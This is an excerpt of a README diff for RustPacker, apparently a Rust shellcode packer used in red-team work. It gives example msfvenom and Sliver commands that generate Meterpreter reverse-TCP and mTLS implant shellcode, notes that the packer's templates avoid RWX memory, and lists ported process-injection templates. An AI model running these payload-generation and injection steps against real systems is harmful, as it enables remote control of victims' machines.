Nariod/RustPacker/README.md

 You can generate raw MSF shellcode using msfvenom's raw format.
 Ex:
 - `msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=127.0.0.1 LPORT=80 -f raw -o msf.bin`

+### Sliver
+You can generate raw [Sliver](https://github.com/BishopFox/sliver) shellcode using Sliver's "--format shellcode".
+Ex:
+- `generate --mtls 127.0.0.1:443 --format shellcode --windows`
+- Do not use Shikata Ga Nai (SGN) Sliver encoder if prompted.
+RustPacker templates do not use RWX memory regions, which are required for SGN to work.

 ## Todo
 - [X] Port createThread Rust template
 - [X] Port createRemoteThread Rust template